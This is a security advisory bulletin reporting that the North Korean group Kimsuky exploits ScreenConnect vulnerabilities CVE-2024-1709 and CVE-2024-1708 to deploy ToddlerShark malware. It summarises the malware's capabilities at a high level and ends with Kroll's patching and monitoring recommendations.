ScreenConnect Flaws Exploited to Drop New ToddlerShark Malware

Late last month, ConnectWise addressed two flaws impacting its remote access software ScreenConnect, which could be exploited by actors to bypass authentication (CVE-2024-1709) and execute code remotely (CVE-2024-1708). Since then, several threat actors have abused the flaws, particularly CVE-2024-1709, in the wild to deploy various payloads including ransomware (Black Basta, Bl00dy, LockBit), remote access trojans, info stealers, and much more. According to cybersecurity analysts at Kroll, North Korean APT group Kimsuky has now joined in the exploitation of these flaws to infect victims with a new malware variant dubbed ToddlerShark. ToddlerShark is believed to be a new variant of the group’s BabyShark and ReconShark backdoors and is mainly designed to harvest/collect system data (hostname, user accounts, active user sessions, running processes, etc) and maintain persistent access to the target system through the help of scheduled tasks. Notable about the malware is its ability to evade detection through the use of legitimate Microsoft binaries such as mshta.exe, which is further used to execute heavily obfuscated VBScripts scripts, making analysis more challenging. ToddlerShark is also capable of modifying the Windows Registry to allow macros to run without triggering alerts and employs randomized strings to alter its structural pattern, rendering signature-based detections ineffective.

Security Officer Comments:
Public-of-concept exploit code has been released for both CVE-2024-1708 and CVE-2024-1709, making it easier for actors like Kimsuky to exploit the flaws for initial access into victim environments and deploy their various payloads. Taking a look at metrics from ShadowServer, there are still thousands of instances vulnerable to CVE-2024-1709. The majority of these instances reside in the United States (2.6K), followed by the United Kingdom (365), and Canada (292), leaving ample opportunity for actors to launch exploitation attempts.

Suggested Corrections:
Kroll has included a set of TTPs employed by the actors in the latest campaign as well as recommendation measures for defending against potential attacks in the wild leveraging the recently addressed ConnectWise flaws. In general, Kroll recommends:
  • Any systems running ConnectWise ScreenConnect versions 23.9.7 and prior should assume compromise and be patched immediately, following the guidance in the ConnectWise advisory.
  • Consider an independent threat hunt/compromise assessment be completed on your systems to ensure that suspicious activity or malware was not inserted prior to patching or remediation.
  • Ensure protection and monitoring of systems, especially those that are directly available on the internet, with an endpoint detection and response (EDR) or next-generation antivirus (NGAV) tool specifically tailored or configured to conduct system scans for webshells.
  • Ensure implementation or configuration of a Web Application Firewall (WAF) or equivalent web traffic monitoring system for purposes of allowing analysis in the event of potential exploitation.